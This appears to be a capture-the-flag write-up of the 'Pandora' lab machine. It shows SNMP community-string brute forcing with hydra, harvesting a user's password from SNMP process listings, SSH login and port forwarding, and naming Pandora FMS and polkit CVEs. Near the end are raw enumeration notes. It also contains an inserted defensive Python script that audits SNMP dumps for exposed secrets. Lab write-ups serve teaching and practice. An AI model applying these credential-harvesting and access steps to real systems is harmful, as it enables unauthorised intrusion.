Proof of Concept
10.129.2.223
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
161/udp open snmp
Initial Access
Accessed the web service on port 80 and found domain information in the footer
- Panda.HTB
Configured the /etc/hosts file
┌──(kali㉿kali)-[~/Pandora]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.2.223 pandora.htb
Found SNMP Community String using hydra
- public
┌──(kali㉿kali)-[~/Pandora]
└─$ hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://10.129.2.223
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-19 10:45:34
[DATA] max 16 tasks per 1 server, overall 16 tasks, 118 login tries (l:1/p:118), ~8 tries per task
[DATA] attacking snmp://10.129.2.223:161/
[161][snmp] host: 10.129.2.223 password: public
[STATUS] attack finished for 10.129.2.223 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-02-19 10:45:34
Enumerated SNMP data
┌──(kali㉿kali)-[~/Pandora]
└─$ snmpbulkwalk -v2c -c public 10.129.2.223 | tee snmpwalk.txt
iso.3.6.1.2.1.1.1.0 = STRING: "Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (208979) 0:34:49.79
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.6.0 = STRING: "Mississippi"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (9) 0:00:00.09
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
<SNIP>
Found user Daniel in SNMP data
┌──(kali㉿kali)-[~/Pandora]
└─$ cat snmpwalk.txt | grep -A 10 -B 10 -i pandora
iso.3.6.1.2.1.1.1.0 = STRING: "Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (208979) 0:34:49.79
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.6.0 = STRING: "Mississippi"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (9) 0:00:00.09
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4
Found Daniel’s credentials in SNMP data
- daniel:HotelBabylon23
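Added example (not part of the original write-up): a defender-side audit in Python that scans a saved snmpbulkwalk dump for hrSWRunParameters rows (iso.3.6.1.2.1.25.4.2.1.5.<pid>) whose process arguments carry a secret, which is how this credential became readable. The flag list, the redaction format and the sample walk lines are assumptions constructed for illustration.

```python
import re

# hrSWRunParameters column of the HOST-RESOURCES-MIB process table, in the
# numeric form snmpbulkwalk prints when no MIB files are loaded.
HR_SW_RUN_PARAMETERS = "iso.3.6.1.2.1.25.4.2.1.5."

# Assumption: argument names that usually carry a secret; extend as needed.
SECRET_FLAG = re.compile(
    r"(?:^|\s)(-p|--password|--pass|--passwd|--token|--secret|--api-key)(?:\s+|=)(\S+)"
)
LINE = re.compile(r'^(\S+) = STRING: "(.*)"\s*$')

# Constructed sample modeled on the walk output in this write-up
# (placeholder account name and password).
SAMPLE_WALK = r'''
iso.3.6.1.2.1.1.5.0 = STRING: "host01"
iso.3.6.1.2.1.25.4.2.1.5.973 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.975 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u svc_monitor -p ExamplePassw0rd'"
iso.3.6.1.2.1.25.4.2.1.5.977 = ""
iso.3.6.1.2.1.25.4.2.1.5.1144 = STRING: "-u svc_monitor -p ExamplePassw0rd"
'''


def find_exposed_secrets(walk_text):
    """Return (pid, flag, redacted_value) for process arguments that carry a secret."""
    findings = []
    for line in walk_text.splitlines():
        m = LINE.match(line)
        if not m or not m.group(1).startswith(HR_SW_RUN_PARAMETERS):
            continue  # not a string-valued row of the process-arguments column
        pid = int(m.group(1)[len(HR_SW_RUN_PARAMETERS):])
        for flag, value in SECRET_FLAG.findall(m.group(2)):
            # "-p /run/snmpd.pid" is a pidfile and "-p --" is another flag: skip both.
            if value.startswith(("/", "-")):
                continue
            value = value.strip("'\"")
            # Redact so the audit report does not become a second leak.
            findings.append((pid, flag, value[:2] + "*" * (len(value) - 2)))
    return findings


if __name__ == "__main__":
    for pid, flag, redacted in find_exposed_secrets(SAMPLE_WALK):
        print(f"pid {pid}: secret passed via {flag} ({redacted}) is readable over SNMP")
```

Any hit means the secret should move out of the command line, and the SNMP view granted to the community should stop exposing the process table.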
┌──(kali㉿kali)-[~/Pandora]
└─$ cat snmpwalk.txt | grep -A 5 -B 5 -i daniel
iso.3.6.1.2.1.1.1.0 = STRING: "Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (208979) 0:34:49.79
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.6.0 = STRING: "Mississippi"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (9) 0:00:00.09
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
--
iso.3.6.1.2.1.25.4.2.1.5.898 = ""
iso.3.6.1.2.1.25.4.2.1.5.961 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.971 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.972 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.973 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.975 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso.3.6.1.2.1.25.4.2.1.5.977 = ""
iso.3.6.1.2.1.25.4.2.1.5.990 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.1039 = ""
iso.3.6.1.2.1.25.4.2.1.5.1040 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1144 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.1347 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1598 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1791 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1822 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1831 = STRING: "-k start"
Authenticated to SSH service using Daniel’s credentials
┌──(kali㉿kali)-[~/Pandora]
└─$ sshpass -p 'HotelBabylon23' ssh daniel@pandora.htb
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 19 Feb 16:18:31 UTC 2026
System load: 0.0
Usage of /: 63.0% of 4.87GB
Memory usage: 8%
Swap usage: 0%
Processes: 234
Users logged in: 0
IPv4 address for eth0: 10.129.2.223
IPv6 address for eth0: dead:beef::250:56ff:feb0:6938
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
daniel@pandora:~$
Lateral Movement (Auth as matt)
Reviewing /etc/apache2/sites-enabled/pandora.conf revealed a web service reachable only from localhost
daniel@pandora:/etc/apache2$ cat ./sites-enabled/pandora.conf
<VirtualHost localhost:80>
ServerAdmin admin@panda.htb
ServerName pandora.panda.htb
DocumentRoot /var/www/pandora
AssignUserID matt matt
<Directory /var/www/pandora>
AllowOverride All
</Directory>
ErrorLog /var/log/apache2/error.log
CustomLog /var/log/apache2/access.log combined
</VirtualHost>
Configured the /etc/hosts file
┌──(kali㉿kali)-[~/Pandora]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.2.223 pandora.htb pandora.panda.htb
Set up SSH port forwarding
┌──(kali㉿kali)-[~/Pandora]
└─$ sshpass -p 'HotelBabylon23' ssh -f -N -L 8888:127.0.0.1:80 daniel@10.129.2.223
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
┌──(kali㉿kali)-[~/Pandora]
└─$ ss -nltp | grep 8888
LISTEN 0 128 127.0.0.1:8888 0.0.0.0:* users:(("ssh",pid=617053,fd=5))
LISTEN 0 128 [::1]:8888 [::]:* users:(("ssh",pid=617053,fd=4))
Browsing to http://localhost:8888 confirmed that Pandora FMS v7.0NG.742_FIX_PERL2020 is running
- Pandora FMS v7.0NG.742_FIX_PERL2020
Found an RCE vulnerability in this version (CVE-2020-5844)
Note_tmp
Vulnerable to CVE-2021-3560
╔══════════╣ PGP Keys and Related Files
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#pgp-keys
GPG:
GPG is installed, listing keys:
-e
NetPGP:
netpgpkeys Not Found
-e
PGP Related Files:
Found: /home/daniel/.gnupg
total 16
drwx------ 2 daniel daniel 4096 Feb 19 16:25 .
drwxr-xr-x 5 daniel daniel 4096 Feb 19 16:25 ..
-rw------- 1 daniel daniel 32 Feb 19 16:25 pubring.kbx
-rw------- 1 daniel daniel 1200 Feb 19 16:25 trustdb.gpg
╔══════════╣ Analyzing MariaDB Files (limit 70)
-rw-r--r-- 1 root root 911 Dec 3 2021 /etc/mysql/mariadb.cnf
[mysqld]
sql_mode=NO_ENGINE_SUBSTITUTION
[client-server]
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/
-rw------- 1 root root 261 Jun 11 2021 /etc/mysql/debian.cnf
╔══════════╣ Backup folders
drwxr-xr-x 2 root root 4096 Jan 3 2022 /var/backups
total 916
-rw-r--r-- 1 root root 51200 Dec 7 2021 alternatives.tar.0
-rw-r--r-- 1 root root 41519 Jan 3 2022 apt.extended_states.0
-rw-r--r-- 1 root root 4495 Nov 23 2021 apt.extended_states.1.gz
-rw-r--r-- 1 root root 4703 Jun 11 2021 apt.extended_states.2.gz
-rw-r--r-- 1 root root 4733 Jun 11 2021 apt.extended_states.3.gz
-rw-r--r-- 1 root root 268 Jun 11 2021 dpkg.diversions.0
-rw-r--r-- 1 root root 172 Jun 11 2021 dpkg.statoverride.0
-rw-r--r-- 1 root root 804382 Nov 23 2021 dpkg.status.0
drwxr-xr-x 2 root root 4096 Dec 7 2021 /var/cache/dbconfig-common/backups
total 0
daniel@pandora:/etc/apache2$ grep -iR passw .
./sites-available/default-ssl.conf: # Note that no password is obtained from the user. Every entry in the user
./sites-available/default-ssl.conf: # file needs this password: `xxj31ZMTZzkVA'.
./apache2.conf:# The following lines prevent .htaccess and .htpasswd files from being